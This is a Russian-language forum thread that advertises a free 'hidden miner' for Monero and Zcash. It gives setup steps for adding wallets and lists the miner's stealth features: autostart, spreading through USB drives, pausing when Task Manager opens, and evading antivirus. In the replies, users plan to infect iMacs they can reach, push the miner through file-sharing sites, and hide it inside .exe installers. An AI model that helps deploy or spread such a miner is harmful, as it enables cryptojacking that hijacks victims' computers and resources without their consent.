Бесплатный скрытый майнер Monero+Zcash

Тема в разделе "ХАЛЯВА", создана пользователем Akellakos, 28 янв 2018.

  1. Скрытый майнер с простой настройкой.

    • Скачиваете сборку или ( пароль 123)
    • Распаковываете и через Winrar заходите в файл system64dr.sys
    • Открываете z.cnf c помощью блокнота и указываете в нем Zcash кошелёк(без рига, только кошелёк)
    • Открываете m.cnf c помощью блокнота и указываете в нем Monero кошелёк(без рига, только кошелёк)
    • Можно просто извлечь эти два файла, отредактировать и снова отправить в архив system64dr.sys, пароль ставить не нужно!
      Чтобы было проще, переименуйте system64dr.sys в system64dr.zip, отредактируйте кошельки и переименуйте обратно в system64dr.sys
    Сборка готова. Майнер монеро работает с dwarfpool.com, monerohash.com - резервный. Прежде чем майнить установите минимальную выплату на dwarfpool, по умолчанию стоит 2 XMR. Zcash майнится на flypool.org, nanopool - резервный.
    Мой fee - 6 минут майнинга с каждого часа(это 10%).

    Особенности:
    • Записывается в автозагрузку
    • Сборка распространяется через флэшки.
    • Монеро майнится как на 64 так и на 32 битных системах, Zcash только 64
    • Запрет компу уходить в сон
    • Нагрузка 50% ЦП и без ограничений на видеокарту
    • При открытии диспетчера майнер отключается, после закрытия сразу запускается
    Сборка пока не детектится антивирусами, если сам майнер будет удалён антивирусом, то заражённый комп будет просто заражать флэшки.
    Будут вопросы, пишите тут или в лс.
     
  2. Сейчас поковыряюсь в сборке, если действительно норм, мне не жалко 10%. Может как-то организованно замутим распространение через файлообменники?
     
  3. vedmag сказал(а):
    Сейчас поковыряюсь в сборке, если действительно норм, мне не жалко 10%. Может как-то организованно замутим распространение через файлообменники?
    Нажмите, чтобы раскрыть...​
    Так сам замути в чем проблема особенно если деньги есть?
    Я великий воин Уганды!
     
  4. Wae сказал(а):
    Так сам замути в чем проблема особенно если деньги есть?
    Нажмите, чтобы раскрыть...​
    Если б они были) А самому чтоб пересобрать екзешник для начала надо его раздербанить- и опять проблема на C++ он или питоне. Вот и предлагаю ТС вместе доработать сборку- исходников то у меня нет.
     
  5. fredsnikoss сказал(а):
    Скрытый майнер с простой настройкой.

    • Скачиваете сборку или ( пароль 123)
    • Распаковываете и через Winrar заходите в файл system64dr.sys
    • Открываете z.cnf c помощью блокнота и указываете в нем Zcash кошелёк(без рига, только кошелёк)
    • Открываете m.cnf c помощью блокнота и указываете в нем Monero кошелёк(без рига, только кошелёк)
    • Можно просто извлечь эти два файла, отредактировать и снова отправить в архив system64dr.sys, пароль ставить не нужно!
      Чтобы было проще, переименуйте system64dr.sys в system64dr.zip, отредактируйте кошельки и переименуйте обратно в system64dr.sys
    Сборка готова. Майнер монеро работает с dwarfpool.com, monerohash.com - резервный. Прежде чем майнить установите минимальную выплату на dwarfpool, по умолчанию стоит 2 XMR. Zcash майнится на flypool.org, nanopool - резервный.
    Мой fee - 6 минут майнинга с каждого часа(это 10%).

    Особенности:
    • Записывается в автозагрузку
    • Сборка распространяется через флэшки.
    • Монеро майнится как на 64 так и на 32 битных системах, Zcash только 64
    • Запрет компу уходить в сон
    • Нагрузка 50% ЦП и без ограничений на видеокарту
    • При открытии диспетчера майнер отключается, после закрытия сразу запускается
    Сборка пока не детектится антивирусами, если сам майнер будет удалён антивирусом, то заражённый комп будет просто заражать флэшки.
    Будут вопросы, пишите тут или в лс.
    Нажмите, чтобы раскрыть...​
    На Mac OS я так понимаю распаковать не получится? Нет сборки под яблоко?
    Homo homini lupus est
     
  6. the_invisible_1 сказал(а):
    На Mac OS я так понимаю распаковать не получится? Нет сборки под яблоко?
    Нажмите, чтобы раскрыть...​
    Я так понимаю ты собрался маководов заражать? Смысла нет. Это геморой (хотя там скрипты нормально бегают и можно НАВЕРНО что то собрать под них), но маков меньшинство. И самое главное яблочные девайсы- это в основном макбуки- на них не намайнишь) поверь. Тут нужны десктопы. Ну а если у тебя мак и как ты выразился "распаковать" чтоб отредактировать, то пользуйся паралелсом и там тестируй, думаю понял о чем я
     
  7. vedmag сказал(а):
    Я так понимаю ты собрался маководов заражать? Смысла нет. Это геморой (хотя там скрипты нормально бегают и можно НАВЕРНО что то собрать под них), но маков меньшинство. И самое главное яблочные девайсы- это в основном макбуки- на них не намайнишь) поверь. Тут нужны десктопы. Ну а если у тебя мак и как ты выразился "распаковать" чтоб отредактировать, то пользуйся паралелсом и там тестируй, думаю понял о чем я
    Нажмите, чтобы раскрыть...​
    Слушай, есть просто доступ к некоторому количеству аймаков, которые можно было бы в теории заразить, вот и задался этим вопросом. Про паралельс понял, благодарю.
    Homo homini lupus est
     
  8. the_invisible_1 сказал(а):
    Слушай, есть просто доступ к некоторому количеству аймаков, которые можно было бы в теории заразить, вот и задался этим вопросом. Про паралельс понял, благодарю.
    Нажмите, чтобы раскрыть...​
    Но у них охлаждение неайс если не ошибаюсь- палево будет. Я как то решил поиздеваться над аймаком и втыкнул туда винду, конфигурация была нормальная так он чуть не дымился) Попробуй сам собрать- поищи на найзе или монергейте исходники для мака. Скрипты прикрутишь и норм- даже не надо парится насчет антивирусов как нам)
     
  9. Wae сказал(а):
    Так сам замути в чем проблема особенно если деньги есть?
    Нажмите, чтобы раскрыть...​
    Потому что продвигать вместе легче потому чт оу всех есть свои идеи а значит и конечный заработок будет больше.
     
  10. leo сказал(а):
    Потому что продвигать вместе легче потому чт оу всех есть свои идеи а значит и конечный заработок будет больше.
    Нажмите, чтобы раскрыть...​
    Истину глаголишь дружище. Я второй день ТС втираю это) Но сам так сам. Пошел я дальше ковырять
     
  11. vedmag сказал(а):
    Истину глаголишь дружище. Я второй день ТС втираю это) Но сам так сам. Пошел я дальше ковырять
    Нажмите, чтобы раскрыть...​
    Нашел уже компанию или так никто не написал в лс?
     
  12. leo сказал(а):
    Нашел уже компанию или так никто не написал в лс?
    Нажмите, чтобы раскрыть...​
    Нет, ломаю голову пока -но прогресс есть
     
  13. vedmag сказал(а):
    Нет, ломаю голову пока -но прогресс есть
    Нажмите, чтобы раскрыть...​
    Поделишься прогрессом в лс?
    Я великий воин Уганды!
     
  14. Зря что только с флэшки можно заражать, вот бы его в какой нибудь .ехе установщик запихать
     
  15. Normal'ный сказал(а):
    Зря что только с флэшки можно заражать, вот бы его в какой нибудь .ехе установщик запихать
    Нажмите, чтобы раскрыть...​
    Запихай если в этом шаришь конечно ну или можешь видосики посмотреть как это делается.
     
  16. А сколько можно на этом заработать если у меня комп средненький?
     

Поделиться этой страницей